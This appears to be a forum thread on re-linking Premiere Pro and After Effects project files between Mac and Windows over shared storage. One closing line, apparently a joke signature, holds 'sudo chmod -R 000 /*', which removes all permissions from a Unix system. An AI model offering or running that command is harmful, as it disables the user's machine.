The video team at my work has been pieced together over time and because of it they use one PC and one MAC. Problem is with using premiere pro and after effects. They have to re-link project files each time they pass a project back and fourth.

They are looking at standardizing on MAC by next year but I wanted to see if there is a way to more automate this whole process by using a network drive.  Problem still exists with the fact that Windows and MAC handle paths differently and still have to be re-linked. Has anyone else experienced this issue and found a solution yet? Only thing I have found is expensive storage systems designed for digital media groups but they are too costly when we already have storage in place.

A possible solution *could* be having a mac with a windows virtual machine on it. Share a folder between the two and have something automatically re-link the files, one instance running on mac os and only touching mac os files and the other running on the vm and only handling windows files. I'm not sure what software you could use to make the linking automatic though.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
